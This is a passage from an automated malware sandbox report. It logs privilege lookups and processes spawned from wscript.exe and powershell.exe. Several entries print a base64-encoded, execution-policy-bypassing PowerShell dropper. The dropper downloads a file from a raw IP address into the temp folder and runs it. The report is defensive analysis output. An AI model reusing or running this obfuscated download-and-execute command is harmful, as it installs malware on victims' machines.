kACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMAAxACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACkAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAtAE8AVQB0AGYAaQBsAGUAIAAgACAAIAAgACAAHSAkAEUAbgBWADoAdABlAE0AUABcAEkAQgBtAFMAZQBuAHQAbwBzAB0gIAAJAAkACQAJAAkACQAJAAkACQAJAAkAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABzAFQAYQByAHQAIAAgACAAIAAgACAAHSAkAGUAbgB2ADoAVABlAG0AUABcAEkAQgBtAFMAZQBuAHQAbwBzAB0g " filepath: C:\Windows\System32\winDOWsPoWersheLL\v1.0\poWeRshElL.exe	1	1	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW July 20, 2023, 12:17 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW July 20, 2023, 12:17 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

One or more non-whitelisted processes were created (4 events)

parent_process	powershell.exe	martian_process	C:\Users\test22\AppData\Local\Temp\IBmSentos
parent_process	powershell.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BypAsS -nop -W 1 -ec IAAJAAkAIAAJAAkAIABbAG4ARQB0AC4AcwBlAFIAdgBpAEMAZQBwAE8AaQBuAFQAbQBhAG4AQQBHAGUAUgBdADoAOgBTAGUAQwBVAHIASQB0AFkAUAByAG8AdABPAGMATwBsACAACQAJAAkACQAJAAkACQAJAAkACQAJAD0AIAAgACAAIAAgACAAIAAgAFsATgBlAHQALgBzAGUAYwBVAFIAaQB0AHkAcABSAE8AVABPAEMAbwBMAFQAWQBwAGUAXQA6ADoAVABsAHMAMQAyACAAIAAgACAAIAAgADsAIAAgACAAIAAgACAAIAAJACAACQAgAAkACQAJAAkAIAAgAAkAIAAJAAkAIABXAGcAZQBUACAAIAAgACAAIAAgACAAIAAgACAAKABbAGMAaABhAHIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADAANAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQA2ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBjAEgAYQByAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAxADYAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMAaABhAHIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADEAMgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAOAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQAOQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQAOQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUANAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQAOQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQA2ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAGgAQQByAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAwADEAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMASABhAFIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADEANQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQA2ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAQQByAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkANAA3ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAYQByAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkANgA3ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBjAGgAQQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAwADQAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMAaABhAHIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADEANAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQAxACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAYQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAwADkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMASABBAHIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADAAMQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADgAMwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMAAxACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAQQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAxADYAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMASABBAFIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADEANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQAyACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAYQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkANAA2ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBjAGgAQQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAwADEAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMAaABBAFIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADIAMAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMAAxACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACkAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAtAE8AVQB0AGYAaQBsAGUAIAAgACAAIAAgACAAHSAkAEUAbgBWADoAdABlAE0AUABcAEkAQgBtAFMAZQBuAHQAbwBzAB0gIAAJAAkACQAJAAkACQAJAAkACQAJAAkAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABzAFQAYQByAHQAIAAgACAAIAAgACAAHSAkAGUAbgB2ADoAVABlAG0AUABcAEkAQgBtAFMAZQBuAHQAbwBzAB0g
parent_process	wscript.exe	martian_process	"C:\Windows\SYSTeM32\winDOWsPoWersheLL\v1.0\poWeRshElL.exe" "PowErShell -ex BypAsS -nop -W 1 -ec IAAJAAkAIAAJAAkAIABbAG4ARQB0AC4AcwBlAFIAdgBpAEMAZQBwAE8AaQBuAFQAbQBhAG4AQQBHAGUAUgBdADoAOgBTAGUAQwBVAHIASQB0AFkAUAByAG8AdABPAGMATwBsACAACQAJAAkACQAJAAkACQAJAAkACQAJAD0AIAAgACAAIAAgACAAIAAgAFsATgBlAHQALgBzAGUAYwBVAFIAaQB0AHkAcABSAE8AVABPAEMAbwBMAFQAWQBwAGUAXQA6ADoAVABsAHMAMQAyACAAIAAgACAAIAAgADsAIAAgACAAIAAgACAAIAAJACAACQAgAAkACQAJAAkAIAAgAAkAIAAJAAkAIABXAGcAZQBUACAAIAAgACAAIAAgACAAIAAgACAAKABbAGMAaABhAHIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADAANAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQA2ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBjAEgAYQByAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAxADYAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMAaABhAHIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADEAMgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAOAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQAOQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQAOQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUANAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQAOQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADUAMgAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADQANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBIAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQA2ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAGgAQQByAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAwADEAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMASABhAFIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADEANQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQA2ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAQQByAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkANAA3ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAYQByAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkANgA3ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBjAGgAQQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAwADQAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMAaABhAHIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADEANAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAGEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQAxACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAYQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAwADkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMASABBAHIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADAAMQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAGEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADgAMwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAQwBoAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMAAxACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAQQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAxADYAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMASABBAFIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADEANwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBIAEEAUgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMQAyACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBDAEgAYQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkANAA2ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACsAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAWwBjAGgAQQBSAF0AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAMQAwADEAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAKwAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQBbAGMAaABBAFIAXQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAxADIAMAAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQArACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAFsAYwBoAEEAcgBdACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJADEAMAAxACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACkAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAtAE8AVQB0AGYAaQBs